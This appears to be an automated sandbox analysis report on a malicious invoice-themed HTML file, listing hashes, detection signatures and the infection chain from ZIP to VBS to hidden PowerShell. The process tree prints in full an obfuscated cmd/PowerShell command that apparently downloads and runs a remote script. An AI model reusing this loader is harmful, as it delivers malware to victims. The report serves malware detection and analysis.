Edit tour
Windows
Analysis Report
faktura_FV2025020637756.html
Overview
General Information
| Sample name: | faktura_FV2025020637756.html |
| Analysis ID: | 1636957 |
| MD5: | fdbd089f6a216713e974db50d00971a7 |
| SHA1: | 3e22441e7e82cf8bfb0a8d407a6908785af289f5 |
| SHA256: | 61fc74fbeb8df66b0d4aeb31bff1203d4fcd6375f272b2d019df1d9fcffdf3e4 |
| Infos: |  |
 | |
Detection
| Score: | 96 |
| Range: | 0 - 100 |
| Confidence: | 100% |
Signatures
System process connects to network (likely due to code injection or exploit)
AI detected suspicious Javascript
Detected javascript redirector / loader
Downloads suspicious files via Chrome
Found suspicious ZIP file
Obfuscated command line found
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Potential Dosfuscation Activity
Sigma detected: Script Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
chrome.exe (PID: 5908 cmdline: "C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --s tart-maxim ized "abou t:blank" MD5: E81F54E6C1129887AEA47E7D092680BF) - chrome.exe (PID: 4528 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --no-pre-r ead-main-d ll --field -trial-han dle=2148,i ,140007486 0924789380 9,15602923 5364216209 25,262144 --disable- features=O ptimizatio nGuideMode lDownloadi ng,Optimiz ationHints ,Optimizat ionHintsFe tching,Opt imizationT argetPredi ction --va riations-s eed-versio n=20250306 -183004.42 9000 --moj o-platform -channel-h andle=2184 /prefetch :3 MD5: E81F54E6C1129887AEA47E7D092680BF) 
unarchiver.exe (PID: 6704 cmdline: "C:\Window s\SysWOW64 \unarchive r.exe" "C: \Users\use r\Download s\faktura_ FV20250206 37756.zip" MD5: 16FF3CC6CC330A08EED70CBC1D35F5D2) - 7za.exe (PID: 6728 cmdline:
"C:\Window s\System32 \7za.exe" x -pinfect ed -y -o"C :\Users\us er\AppData \Local\Tem p\nrz2r3tl .2ab" "C:\ Users\user \Downloads \faktura_F V202502063 7756.zip" MD5: 77E556CDFDC5C592F5C46DB4127C6F4C) 
conhost.exe (PID: 6736 cmdline: C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 6796 cmdline:
"cmd.exe" /C "C:\Use rs\user\Ap pData\Loca l\Temp\nrz 2r3tl.2ab\ 2025020641 549.vbs" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 6804 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
wscript.exe (PID: 6864 cmdline: "C:\Window s\System32 \WScript.e xe" "C:\Us ers\user\A ppData\Loc al\Temp\nr z2r3tl.2ab \202502064 1549.vbs" MD5: FF00E0480075B095948000BDC66E81F0) - cmd.exe (PID: 6268 cmdline:
"C:\Window s\System32 \cmd.exe" /C "echo $ ($kwXZtAwe j = $('{4} {10}{9}' - f $('vgLBi PIqRxeU'.T oCharArray ())); $((2 73,234,303 ,348,138,2 49,303,342 ,354,315,2 97,303,240 ,333,315,3 30,348,231 ,291,330,2 91,309,303 ,342,279,1 74,174,249 ,303,342,3 54,303,342 ,201,303,3 42,348,315 ,306,315,2 97,291,348 ,303,258,2 91,324,315 ,300,291,3 48,315,333 ,330,201,2 91,324,324 ,294,291,2 97,321,96, 183,96,369 ,108,348,3 42,351,303 ,375,177,9 6,108,291, 222,333,26 1,351,198, 360,96,183 ,96,273,24 9,363,345, 348,303,32 7,138,234, 303,348,13 8,216,348, 348,336,26 1,303,294, 246,303,33 9,351,303, 345,348,27 9,174,174, 201,342,30 3,291,348, 303,120,11 7,312,348, 348,336,34 5,174,141, 141,306,31 5,324,303, 312,333,34 5,348,150, 144,144,16 8,168,159, 138,315,33 0,306,333, 174,147,15 3,162,150, 147,141,35 7,303,294, 159,138,33 6,312,336, 117,123,17 7,96,108,2 91,222,333 ,261,351,1 98,360,138 ,252,315,3 27,303,333 ,351,348,9 6,183,96,1 53,144,144 ,144,144,1 44,177,96, 108,120,27 3,249,363, 345,348,30 3,327,138, 219,333,13 8,249,348, 342,303,29 1,327,246, 303,291,30 0,303,342, 279,120,10 8,291,222, 333,261,35 1,198,360, 138,213,30 3,348,246, 303,345,33 6,333,330, 345,303,12 0,123,138, 213,303,34 8,246,303, 345,336,33 3,330,345, 303,249,34 8,342,303, 291,327,12 0,123,123, 123,138,24 6,303,291, 300,252,33 3,207,330, 300,120,12 3,96,372,9 6,219,207, 264)^^^|%{ [char]($_/ 3)})-join' ') ^^^| ^^ ^&($kwXZtA wej) | C:\ Windows\Sy sWOW64\Win dowsPowerS hell\v1.0\ powershell .exe -Wind ow Hidden -c -" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 6376 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 3068 cmdline:
C:\Windows \system32\ cmd.exe /S /D /c" ec ho $($kwXZ tAwej = $( '{4}{10}{9 }' -f $('v gLBiPIqRxe U'.ToCharA rray())); $((273,234 ,303,348,1 38,249,303 ,342,354,3 15,297,303 ,240,333,3 15,330,348 ,231,291,3 30,291,309 ,303,342,2 79,174,174 ,249,303,3 42,354,303 ,342,201,3 03,342,348 ,315,306,3 15,297,291 ,348,303,2 58,291,324 ,315,300,2 91,348,315 ,333,330,2 01,291,324 ,324,294,2 91,297,321 ,96,183,96 ,369,108,3 48,342,351 ,303,375,1 77,96,108, 291,222,33 3,261,351, 198,360,96 ,183,96,27 3,249,363, 345,348,30 3,327,138, 234,303,34 8,138,216, 348,348,33 6,261,303, 294,246,30 3,339,351, 303,345,34 8,279,174, 174,201,34 2,303,291, 348,303,12 0,117,312, 348,348,33 6,345,174, 141,141,30 6,315,324, 303,312,33 3,345,348, 150,144,14 4,168,168, 159,138,31 5,330,306, 333,174,14 7,153,162, 150,147,14 1,357,303, 294,159,13 8,336,312, 336,117,12 3,177,96,1 08,291,222 ,333,261,3 51,198,360 ,138,252,3 15,327,303 ,333,351,3 48,96,183, 96,153,144 ,144,144,1 44,144,177 ,96,108,12 0,273,249, 363,345,34 8,303,327, 138,219,33 3,138,249, 348,342,30 3,291,327, 246,303,29 1,300,303, 342,279,12 0,108,291, 222,333,26 1,351,198, 360,138,21 3,303,348, 246,303,34 5,336,333, 330,345,30 3,120,123, 138,213,30 3,348,246, 303,345,33 6,333,330, 345,303,24 9,348,342, 303,291,32 7,120,123, 123,123,13 8,246,303, 291,300,25 2,333,207, 330,300,12 0,123,96,3 72,96,219, 207,264)^| %{[char]($ _/3)})-joi n'') ^| ^& ($kwXZtAwe j) " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) 
powershell.exe (PID: 3984 cmdline: C:\Windows \SysWOW64\ WindowsPow erShell\v1 .0\powersh ell.exe -W indow Hidd en -c - MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- chrome.exe (PID: 6392 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" "C:\ Users\user \Desktop\f aktura_FV2 0250206377 56.html" MD5: E81F54E6C1129887AEA47E7D092680BF)
- cleanup
⊘No configs have been found
⊘No yara matches
System Summary |   |
|---|
| Source: | Author: frack113, Florian Roth: | ||
| Source: | Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): | ||
| Source: | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: | ||
| Source: | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: | ||
| Source: | Author: frack113, Nasreddine Bencherchali (Nextron Systems): | ||